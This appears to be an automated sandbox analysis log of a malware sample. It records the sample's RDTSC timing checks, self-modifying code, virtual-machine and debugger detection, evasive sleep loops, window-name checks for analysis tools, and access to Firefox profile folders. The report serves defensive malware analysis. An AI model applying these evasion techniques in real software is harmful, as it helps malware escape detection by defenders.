Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601198 second address: 76011EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+0Ch], eax 0x0000000b jmp 00007F1F81013DB7h 0x00000010 mov eax, dword ptr [esi+10h] 0x00000013 jmp 00007F1F81013DB6h 0x00000018 mov dword ptr [edx+10h], eax 0x0000001b pushad 0x0000001c mov bx, cx 0x0000001f mov bx, si 0x00000022 popad 0x00000023 mov eax, dword ptr [esi+14h] 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov ax, bx 0x0000002c push edx 0x0000002d pop eax 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76011EA second address: 76011F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76011F0 second address: 7601210 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+14h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1F81013DB3h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601210 second address: 7601236 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D77659h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+18h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601236 second address: 760123A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760123A second address: 7601240 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601240 second address: 7601264 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+18h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx edi, cx 0x00000012 mov si, 7F25h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601264 second address: 76012E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 jmp 00007F1F80D7764Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esi+1Ch] 0x00000010 pushad 0x00000011 mov cx, 5013h 0x00000015 mov cx, DA6Fh 0x00000019 popad 0x0000001a mov dword ptr [edx+1Ch], eax 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F1F80D77657h 0x00000024 or ecx, 6F5EF6AEh 0x0000002a jmp 00007F1F80D77659h 0x0000002f popfd 0x00000030 popad 0x00000031 mov eax, dword ptr [esi+20h] 0x00000034 pushad 0x00000035 jmp 00007F1F80D7764Ch 0x0000003a mov bx, si 0x0000003d popad 0x0000003e mov dword ptr [edx+20h], eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76012E0 second address: 76012E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76012E6 second address: 7601333 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D77650h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+24h] 0x0000000c jmp 00007F1F80D77650h 0x00000011 mov dword ptr [edx+24h], eax 0x00000014 jmp 00007F1F80D77650h 0x00000019 mov eax, dword ptr [esi+28h] 0x0000001c pushad 0x0000001d push eax 0x0000001e mov si, bx 0x00000021 pop edi 0x00000022 popad 0x00000023 mov dword ptr [edx+28h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601333 second address: 7601337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601337 second address: 760133D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760133D second address: 7601342 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601342 second address: 7601361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, 5F70BDC7h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ecx, dword ptr [esi+2Ch] 0x0000000f jmp 00007F1F80D7764Ah 0x00000014 mov dword ptr [edx+2Ch], ecx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601361 second address: 760144E instructions: 0x00000000 rdtsc 0x00000002 call 00007F1F81013DB3h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushfd 0x0000000b jmp 00007F1F81013DB9h 0x00000010 xor cx, 55C6h 0x00000015 jmp 00007F1F81013DB1h 0x0000001a popfd 0x0000001b popad 0x0000001c mov ax, word ptr [esi+30h] 0x00000020 pushad 0x00000021 push eax 0x00000022 mov ax, di 0x00000025 pop ebx 0x00000026 call 00007F1F81013DB4h 0x0000002b mov ch, ADh 0x0000002d pop edx 0x0000002e popad 0x0000002f mov word ptr [edx+30h], ax 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007F1F81013DB8h 0x0000003a xor al, FFFFFFF8h 0x0000003d jmp 00007F1F81013DABh 0x00000042 popfd 0x00000043 mov bh, ch 0x00000045 popad 0x00000046 mov ax, word ptr [esi+32h] 0x0000004a jmp 00007F1F81013DABh 0x0000004f mov word ptr [edx+32h], ax 0x00000053 jmp 00007F1F81013DB6h 0x00000058 mov eax, dword ptr [esi+34h] 0x0000005b pushad 0x0000005c pushfd 0x0000005d jmp 00007F1F81013DAEh 0x00000062 xor ax, 10B8h 0x00000067 jmp 00007F1F81013DABh 0x0000006c popfd 0x0000006d push eax 0x0000006e push edx 0x0000006f push eax 0x00000070 pop edx 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760144E second address: 7601480 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F1F80D77652h 0x00000008 and si, 4B18h 0x0000000d jmp 00007F1F80D7764Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov dword ptr [edx+34h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601480 second address: 7601484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601484 second address: 7601488 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601488 second address: 760148E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760148E second address: 760150B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D7764Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, 00000700h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F1F80D7764Eh 0x00000016 sub ax, ECA8h 0x0000001b jmp 00007F1F80D7764Bh 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007F1F80D77658h 0x00000027 xor cx, DF08h 0x0000002c jmp 00007F1F80D7764Bh 0x00000031 popfd 0x00000032 popad 0x00000033 jne 00007F1FEF0A586Fh 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F1F80D77655h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760150B second address: 7601511 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601511 second address: 7601515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601515 second address: 7601590 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b or dword ptr [edx+38h], FFFFFFFFh 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F1F81013DB4h 0x00000016 jmp 00007F1F81013DB5h 0x0000001b popfd 0x0000001c mov bx, ax 0x0000001f popad 0x00000020 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000024 pushad 0x00000025 push eax 0x00000026 mov di, 4CCAh 0x0000002a pop edx 0x0000002b mov dx, si 0x0000002e popad 0x0000002f or dword ptr [edx+40h], FFFFFFFFh 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F1F81013DB9h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601590 second address: 76015B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 call 00007F1F80D77653h 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 movzx eax, bx 0x00000016 movsx edx, ax 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76015B8 second address: 76015BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76015BE second address: 76015C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76303FB second address: 76303FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76303FF second address: 7630405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75E0A39 second address: 75E0A3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75E0A3F second address: 75E0A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75E0A43 second address: 75E0A83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F1F81013DADh 0x00000015 and ecx, 29623BD6h 0x0000001b jmp 00007F1F81013DB1h 0x00000020 popfd 0x00000021 movzx eax, di 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75E0A83 second address: 75E0AA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F80D77659h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75E0AA0 second address: 75E0AA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75E0AA4 second address: 75E0ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov dx, 5D6Ch 0x00000010 jmp 00007F1F80D77655h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75E0ACA second address: 75E0AD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75E0AD0 second address: 75E0AD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D0029 second address: 75D0071 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F1F81013DAEh 0x0000000f push eax 0x00000010 jmp 00007F1F81013DABh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F1F81013DB5h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D0071 second address: 75D0081 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F80D7764Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D0081 second address: 75D0085 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D0085 second address: 75D0095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D0095 second address: 75D0099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D0099 second address: 75D009F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D009F second address: 75D00A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 47172734h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D00A9 second address: 75D00B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 and esp, FFFFFFF0h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D00B9 second address: 75D00BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D00BD second address: 75D00C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D00C1 second address: 75D00C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D00C7 second address: 75D00EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D7764Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 44h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1F80D7764Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D00EA second address: 75D00F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D00F0 second address: 75D00F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D00F4 second address: 75D0114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop esi 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D0114 second address: 75D011A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D011A second address: 75D015F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F1F81013DB7h 0x00000010 xor cx, 9EEEh 0x00000015 jmp 00007F1F81013DB9h 0x0000001a popfd 0x0000001b push eax 0x0000001c push edx 0x0000001d mov dh, cl 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D015F second address: 75D0193 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F1F80D77653h 0x00000008 jmp 00007F1F80D77653h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D0193 second address: 75D01AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 11049D1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 12A2285 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 12B9B3B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 13387F0 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1009 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1841 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1789 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1793 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1810 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 1.2 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 5532 Thread sleep count: 52 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5532 Thread sleep time: -104052s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4668 Thread sleep count: 48 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4668 Thread sleep time: -96048s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6524 Thread sleep count: 1009 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6524 Thread sleep time: -2019009s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6128 Thread sleep count: 1841 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6128 Thread sleep time: -3683841s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 984 Thread sleep count: 1789 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 984 Thread sleep time: -3579789s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4760 Thread sleep count: 1793 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4760 Thread sleep time: -3587793s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6552 Thread sleep count: 1810 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6552 Thread sleep time: -3621810s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 7584 Thread sleep count: 285 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\doomed\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\entries\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: Amcache.hve.12.dr Binary or memory string: VMware
Source: Amcache.hve.12.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.12.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.12.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.12.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.12.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.12.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.12.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.12.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.12.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.12.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.12.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: chrome.exe, 00000003.00000002.2395711536.0000025DCEA9E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.12.dr Binary or memory string: vmci.sys
Source: Amcache.hve.12.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.12.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.12.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.12.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.12.dr Binary or memory string: VMware20,1
Source: Amcache.hve.12.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.12.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.12.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.12.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.12.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.12.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.12.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.12.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.12.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.12.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.12.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_00B38230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 7_2_00B38230
